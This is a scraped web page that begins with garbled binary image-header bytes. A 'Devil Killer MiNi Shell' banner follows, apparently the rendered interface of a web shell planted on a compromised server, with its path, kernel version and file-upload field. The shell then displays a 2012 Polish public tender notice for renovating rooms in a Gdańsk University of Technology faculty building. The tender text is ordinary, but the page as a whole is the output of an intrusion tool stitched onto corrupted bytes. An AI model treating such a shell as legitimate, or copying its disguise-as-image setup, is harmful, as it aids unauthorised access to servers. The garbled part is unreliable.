JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120702/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120702/143587-N-2012.html

<p class="kh_header"><b>Gdańsk: Wykonanie remontu w pomieszczeniach 04, 626, 812, 811a, 811b, 811c i korytarza przy pomieszczeniu 812 w budynku Wydziału Elektroniki, Telekomunikacji i Informatyki Politechniki Gdańskiej</b><br>
<b>Numer ogłoszenia: 143587 - 2012; data zamieszczenia: 02.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Politechnika Gdańska Wydział Elektroniki, Telekomunikacji i Informatyki , ul. Narutowicza 11/12, 80-233 Gdańsk, woj. pomorskie, tel. +48 58 348 61 52, faks +48 58 347 24 45.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.dzp.pg.gda.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie remontu w pomieszczeniach 04, 626, 812, 811a, 811b, 811c i korytarza przy pomieszczeniu 812 w budynku Wydziału Elektroniki, Telekomunikacji i Informatyki Politechniki Gdańskiej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie  remontu w pomieszczeniach 04, 626, 812, 811a, 811b, 811c i korytarza przy pomieszczeniu 812 w budynku Wydziału Elektroniki, Telekomunikacji i Informatyki Politechniki Gdańskiej


Zakres prac obejmować będzie wykonanie robót w branży ogólnobudowlanej i  elektrycznej.  
Budynek A Wydziału Elektroniki, Telekomunikacji i Informatyki Politechniki Gdańskiej, w którym prowadzone będą prace remontowe jest budynkiem o 9 kondygnacjach i kubaturze 58 332 m3.
Pomieszczenia przeznaczone do remontu  znajdują się na parterze w budynku WETI na terenie kampusu Politechniki Gdańskiej. 
Dane liczbowe dla remontowanego pomieszczenia :
Powierzchnia pom 04                              -  32,60m2
Powierzchnia pom 626                            -  48,90m2
Powierzchnia pom 812                            - 23,48m2  
Powierzchnia pom 811a                          - 22,25m2
Powierzchnia pom 811b                          - 13,53m2
Powierzchnia pom 811c                           -  7,23m2
Powierzchnia korytarza przed pom 812   -  7,37m2
Łączna powierzchnia remontowanych pomieszczeń:155,36m2.
Wysokość pomieszczeń 04 i 626 wynosi 300cm, pozostałych pomieszczeń od 242cm do 250cm.
Remont pomieszczeń  dotyczy prac budowlanych wykończeniowych. Sposób użytkowania nie ulega zmianie.

Przedmiot zamówienia określają:
1)	projekt techniczny - branża budowlana
2)	projekt techniczny - branża elektryczna
3)	specyfikacja techniczna wykonania i odbioru robót budowlanych (STWIORB)
4)	przedmiary robót
               - branża budowlana 
               - branża elektryczna
  
Przedmiary robót przekazane są celem ułatwienia  wyliczenia ceny ofertowej i sporządzenia kosztorysu ofertowego.

ZAKRES PRAC DO WYKONANIA:

I.	Zakres robót związany z rozbiórką i demontażem dotyczy następujących elementów:
      Pomieszczenie  04
1.	rozbiórka wykładziny PCV na podłodze pomieszczenia
2.	zeskrobanie starej farby ze ścian w  pokoju.
3.	demontaż instalacji elektrycznej  i oświetleniowej: przewodów, puszek, gniazd, przełączników, lamp oświetleniowych według opisu w dokumentacji elektrycznej.
       Pomieszczenie 626
1.	rozbiórka wykładziny PCV na podłodze pomieszczenia
2.	zeskrobanie starej farby ze ścian i sufitu po demontażu płyt,
3.	demontaż instalacji elektrycznej  i oświetleniowej: przewodów, puszek, gniazd, przełączników, lamp oświetleniowych według opisu w dokumentacji elektrycznej.
      Pomieszczenie 812, nr 811a, nr 811b, nr 811c i korytarz  przy pom 812
1.	rozbiórka wykładziny PCV na podłodze pomieszczeń
2.	zeskrobanie starej farby ze ścian i sufitu po demontażu płyt,
3.	w pom 812 demontaż istniejącej umywalki , 
4.	w pom 812 demontaż instalacji elektrycznej  i oświetleniowej: przewodów, puszek, gniazd, przełączników, lamp oświetleniowych według opisu w dokumentacji elektrycznej.
5.	W pom 811b przesunięcie 1 punktu oświetleniowego, doprowadzenie przewodu siły wg opisu dokumentacji elektrycznej
       Bezużyteczne elementy i materiały powinny być  wywiezione na wysypisko. 

II.	Zakres robót remontowych:
      Pomieszczenie 04
1.	zagruntowanie podłoża pod posadzki i wyrównanie powierzchni posadzek wylewką samopoziomującą 
2.	ułożenie wykładziny rulonowej z PCV w pomieszczeniu
3.	założenia narożników wypukłych  wokół ościeży okien i drzwi, 
4.	po wcześniejszym ułożeniu przewodów elektrycznych wyrównanie powierzchni ścian i sufitów 
5.	gruntowanie i dwukrotne malowanie sufitów farbą emulsyjną i ścian farbą emulsyjna odporną na ścieranie 
6.	szpachlowanie i malowanie parapetów farbą olejną ,
7.	montaż instalacji oświetleniowej, gniazd, komputerowej wg projektu elektrycznego.
      Pomieszczenie 626
1.	zagruntowanie podłoża pod posadzki i wyrównanie powierzchni posadzek wylewką samopoziomującą 
2.	ułożenie wykładziny rulonowej z PCV w pomieszczeniu
3.	założenie narożników wypukłych  wokół ościeży okien i drzwi, 
4.	gruntowanie i dwukrotne malowanie sufitów farbą emulsyjną i ścian farbą emulsyjna odporną na ścieranie 
5.	szpachlowanie i malowanie parapetów farbą olejną 
6.	malowanie farbą olejną grzejników i rur c.o. (farbą przeznaczoną do malowania grzejników).
       Pomieszczenie 812, nr 811a,  korytarz  przy pom 812
1.	zagruntowanie podłoża pod posadzki i wyrównanie powierzchni posadzek wylewką samopoziomującą 
2.	ułożenie wykładziny rulonowej z PCV w pomieszczeniu
3.	gruntowanie i dwukrotne malowanie sufitów farbą emulsyjną i ścian farbą emulsyjna odporną na ścieranie, 
4.	montaż glazury na ścianie w miejscu montażu  nowej  umywalki, 
5.	w pom.812 w istniejących oknach zamontować nawiewniki z okapapmi
6.	montaż instalacji oświetleniowej, gniazd, komputerowej wg projektu elektrycznego w pom nr 812.
       Pomieszczenie nr 811b, nr 811c 
1.	zagruntowanie podłoża pod posadzki i wyrównanie powierzchni posadzek  
 wylewką samopoziomującą 
2.	ułożenie płytek z gresu technicznego na podłogach,
3.	montaż na suficie osłony z plexi  w pom nr 811b
4.	montaż glazury na ścianach w pom. nr 811b,
5.	gruntowanie i dwukrotne malowanie sufitów farbą emulsyjną i ścian farbą emulsyjna odporną na ścieranie 
6.	przesunięcie na suficie punktu oświetleniowego w pom 811b
Naprawa tynków.
W pom 812 w miejscu gdzie zostały usunięte ze ścian płytki z glazury należy wykonać nowy tynk. Miejsca uzupełnionego tynku  wykończyć gładzią gipsową, We wszystkich  pomieszczeniach w przypadku  drobnych uszkodzeń powierzchni ścian i sufitów należy uzupełnić ubytki np. gotową zaprawą tynkarską, a w obrębie spękań wkleić taśmę lub siatkę elastyczną. Naroża zewnętrzne otworów okiennych i drzwiowych zabezpieczyć narożnikami aluminiowymi perforowanymi.  Powierzchnia ścian i sufitu  po naprawach w obu pomieszczeniach ma być gładka. 
Ułożenie glazury na ścianie w pom 812 i nr 811b  
W pomieszczeniu nr 812 w miejscu gdzie będzie zamontowana umywalka w zabudowie meblowej, wykonać fartuch z glazury od podłogi na wysokość 150cm i  szerokość 80cm. W pomieszczeniu 811b na pełną wysokość ściany 2,5m i szerokość  4,90m ułożyć glazurę. Wymiary glazury  20 x 30cm kolor do uzgodnienia z użytkownikiem.
Prace malarskie.
Zakres prac malarskich dotyczy:
1.	malowania farbami emulsyjnymi tynków ścian i sufitu,
2.	malowanie farbami olejnymi parapetów,
3.	malowanie grzejników i rur stalowych,
Po zabezpieczeniu podłóg, okien i drzwi folią oraz po ułożeniu przewodów elektrycznych należy zmyć i zeskrobać starą farbę ze ścian i sufitu, naprawić uszkodzenia powierzchni tynków wg opisu jak wyżej . Sufity malować farbą emulsyjną,  a ściany farbą emulsyjną odporną na szorowanie na mokro kl.2 wg PN-EN 13300; 2002.  Sufit malować w kolorze białym, ściany w kolorze jasnym pastelowym, odcień uzgodniony z użytkownikiem. W pomieszczeniu nr 04 i nr 626 elementy stalowe (grzejniki i rury c.o.) malować farbą olejną matową (przeznaczoną do malowania c.o.) w kolorze zbliżonym do ścian malowanych farbą emulsyjną. Parapety w pomieszczeniach szpachlować i malować farbą olejną matową w kolorze białym. Farby muszą posiadać dopuszczenie do stosowania w pomieszczeniach użyteczności publicznej o dużym natężeniu ruchu.
Posadzki i podłogi.
Po zerwaniu podłogi z wykładziny PCV i oczyszczeniu z resztek kleju należy wykonać naprawy podłoża, posadzkę wyrównać wylewką samopoziomującą i na tak przygotowanym podłożu ułożyć w pomieszczeniach: nr 04 , nr 626, nr 812, nr 811a wykładzinę rulonową PCV. 
Planuje się ułożenie wykładziny rulonowej PCV homogenicznej odpornej na bardzo duże natężenie ruchu, odpornej na zabrudzenia, antystatycznej, niepalnej, nie wydzielającej substancji toksycznych o grubości minimum 2,0mm, zgrzewanej do podłoża i wywiniętej na ścianę 10cm.
Posadzka powinna być położona ściśle według zaleceń producenta tak, by zapewnić jej pożądane parametry użytkowe.
Kolorystykę wykładziny należy uzgodnić z zamawiającym.
Po zerwaniu podłogi z wykładziny PCV i oczyszczeniu z resztek kleju w pomieszczeniach nr 811b i nr 811c należy wykonać naprawy podłoża, posadzkę wyrównać wylewką samopoziomującą i na tak przygotowanym podłożu ułożyć na klej płytki z gresu technicznego o wymiarach 30x 30 cm gr min 8mm o klasie ścieralności - 5 i klasie antypoślizgowości- 9. Kolor uzgodnić z użytkownikiem.
Zabudowa sufitu.
W pomieszczeniu 811b w narożniku na suficie należy wykonać wydzielenie pionowymi ściankami kwadrat o wym 2,0m na 1,8m z twardej  płyty z plexi przeźroczystego o gr 6mm.
Płyty należy mocować do sufitu prostopadle,  za pomocą uchwytów. Wymiary płyt: długość: 200cm, 180cm, 30cm wszystkie o wysokości 45cm. 
Instalacje wod-kan.
W pomieszczeniu nr 812 należy istniejącą umywalkę zdemontować i wykonać nowe podejścia wod-kan do miejsca podłączenia nowej umywalki (przesunięcia istniejących podejść o około 40cm), podejścia zakończyć zaworkami.
Nowa umywalka będzie dostarczona wraz z projektowana zabudową pomieszczenia. 
Nawiewniki w oknach.
W pomieszczeniu 812 w dwóch istniejących oknach zamontować w górnej części skrzydła okiennego po jednym  nawiewniku. Nawiewniki muszą posiadać możliwość regulacji dopływu powietrza. Zamontować nawiewnik o długości do 400mm i maksymalnej wysokości do 30mm. Od wewnętrznej strony zamontować nawiewnik z wlotem powietrza skierowanym ku górze. Na zewnątrz zamontować standardowy okap zewnętrzny z filtrem przeciw owadom.  Całość ma stanowić kompletny zestaw. 
III. Roboty elektryczne:
Remontowane pomieszczenia:
- sala nr 04
- sala nr 626
- sala poziom 800
Istniejąca instalacja elektryczna - do dalszego wykorzystania.
Wykonać nowe instalacje elektryczne :
- zasilanie z rozdzielni piętrowej
- nowe rozdzielnie dla sal
- gniazda wtyczkowe
- montaż opraw oświetleniowych
- instalacja sieci komputerowej z osprztem i elementami aktywnymi
Układ sieci TNS, ochrona dodatkowa od porażeń prądem - samoczynne wyłączenie zasilania.
UWAGA!
Dokładne lokalizacje gniazd ustalić z użytkownikami poszczególnych sal.
Szczegółowy zakres opisany w projektach technicznych.
Uwaga ! : 
Określenie w dokumentacji opisującej przedmiot zamówienia niektórych urządzeń poprzez wskazanie ich znaków towarowych lub nazw producentów nie jest równoznaczne z obowiązkiem ich przyjęcia w ofercie. Wykonawca może zamiast nich zastosować odpowiednie równoważne urządzenia o nie gorszych parametrach technicznych, jakościowych i eksploatacyjnych. W przypadku zastosowania urządzeń lub materiałów równoważnych Wykonawca zobowiązany jest załączyć do oferty dokumenty potwierdzające równoważność zaoferowanych wyrobów.
Zamawiający wymaga udzielenia gwarancji 36-miesięcznej na wykonane roboty (licząc od daty podpisania protokołu końcowego odbioru robót).

Wykonawca w przypadku stwierdzenia konieczności wprowadzenia zmian lub modyfikacji w przedmiocie zamówienia zwraca się z wnioskiem do zamawiającego w trybie określonym w art. 38 ustawy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.11.11.00-9, 45.43.21.00-5, 45.44.21.00-8, 45.31.12.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 28.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Warunkiem przystąpienia do przetargu jest wniesienie, przed upływem terminu składania ofert, wadium w wysokości 1 500,00 zł (słownie: Jeden tysiąc pięćset złotych). 
Wniesienie wadium w pieniądzu za pomocą przelewu bankowego Zamawiający będzie uważał za skuteczne tylko wówczas, gdy bank prowadzący rachunek Zamawiającego potwierdzi, że otrzymał taki przelew przed upływem terminu składania ofert tj. do dnia 17.07.2012r., do godz. 10:00.
W wymienionym przypadku dołączenie do oferty kopii polecenia przelewu wystawionego przez Wykonawcę nie jest warunkiem koniecznym do stwierdzenia przez Zamawiającego terminowego wniesienia wadium przez Wykonawcę.
2.	Wadium może być wniesione w jednej lub kilku następujących formach:
1)	w pieniądzu - 	przelewem na rachunek bankowy Zamawiającego nr Bank Milienium 64 1160 2202 0000 0001 8607 3782 z dopiskiem: Remont w pomieszczeniach 04, 626, 812, 811a, 811b, 811c i korytarza przy pomieszczeniu 812  w budynku Wydziału ETI
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym, 
3)	gwarancjach bankowych,
4)	gwarancjach ubezpieczeniowych,
5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b, ust. 5, pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tekst jednolity Dz. U. z 2007 r. Nr 42, poz. 275)
-	poprzez zdeponowanie za pokwitowaniem oryginału dokumentu w Kwesturze Politechniki Gdańskiej, I piętro Gmachu B PG w Gdańsku, przy ul. G. Narutowicza 11/12, w dniach od poniedziałku do piątku, w godz. 900 do 1300.
3.	Dokument wadialny (poręczenie lub gwarancja) musi być sporządzony zgodnie z obowiązującym prawem i zawierać następujące elementy:
1)	nazwę oraz wskazanie siedziby: dającego zlecenie (Wykonawcy), beneficjenta gwarancji/poręczyciela (Zamawiającego), oraz gwaranta/poręczyciela (banku lub instytucji ubezpieczeniowej)
2)	określenie postępowania o udzielenie zamówienia publicznego, którego dotyczy 
3)	kwotę 
4)	termin ważności 
5)	mieć formę oświadczenia bezwarunkowego płatnego na pierwsze pisemne żądanie Zamawiającego, bez pośrednictwa banku lub innej tego typu instytucji
6)	być nieodwołalny, 
7)	obejmować odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez Wykonawcę, określone w art. 46 ust. 4a, 5 ustawy PZP, 
8)	a także obejmować cały okres związania ofertą, określony w specyfikacji.
4.	Zamawiający dokona zwrotu wadium wszystkim Wykonawcom zgodnie z art. 46 ust. 1 do 4 ustawy PZP.
5.	Zamawiający zaleca dołączenie do oferty dowodu wniesienia wadium tj. odpowiednio:
1) kopii potwierdzenia dokonania przelewu 
2) potwierdzoną za zgodność z oryginałem kserokopię złożonego w Kwesturze PG poręczenia lub gwarancji, z adnotacją Kwestury PG o terminie złożenia w niej oryginału tego dokumentu.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Działalność prowadzona na potrzeby wykonania przedmiotu zamówienia nie wymaga 
     posiadania specjalnych uprawnień.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże , że wykonał w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, roboty budowlane w istniejących budynkach na łączną kwotę co najmniej 100 000,00  zł brutto , zgodnie z zasadami sztuki budowlanej i prawidłowo ukończył</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponował osobami zdolnymi do wykonania zamówienia, posiadającymi doświadczenie, wykształcenie i kwalifikacje zawodowe odpowiednie do stanowisk, jakie zostaną im powierzone tj.:
a)	osobą, która będzie pełnić funkcję kierownika budowy, posiadającą uprawnienia do kierowania robotami budowlanymi  w specjalności konstrukcyjno-budowlanej bez ograniczeń oraz doświadczenie w pełnieniu funkcji kierownika budowy  przy realizacji minimum dwóch robót budowlanych w istniejących budynkach na łączną kwotę co najmniej 80 000,00 zł brutto
b)	osobą, która będzie pełnić funkcję kierownika robót branży elektrycznej, posiadającą uprawnienia do kierowania robotami budowlanymi  w specjalności instalacyjnej w zakresie sieci, instalacji, urządzeń elektrycznych i elektroenergetycznych bez ograniczeń oraz doświadczenie w pełnieniu funkcji kierownika budowy  przy realizacji minimum dwóch robót budowlanych w istniejących budynkach na łączną kwotę co najmniej 80 000,00 zł brutto

UWAGA!
Zamawiający, określając wymogi dla każdej osoby w zakresie posiadanych uprawnień budowlanych, dopuszcza odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz odpowiadające im uprawnienia wydane obywatelom państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej, z zastrzeżeniem art. 12a oraz innych przepisów ustawy Prawo Budowlane (tekst jedn. Dz.U. z 2006r., Nr 156, poz. 1118 ze zm.) oraz ustawy o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2008r., Nr 63, poz. 394).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1/Jeżeli w miejscu zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt.  III.4.3.1 zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania - wystawionych nie wcześniej niż 6 miesięcy przed terminem składania ofert,
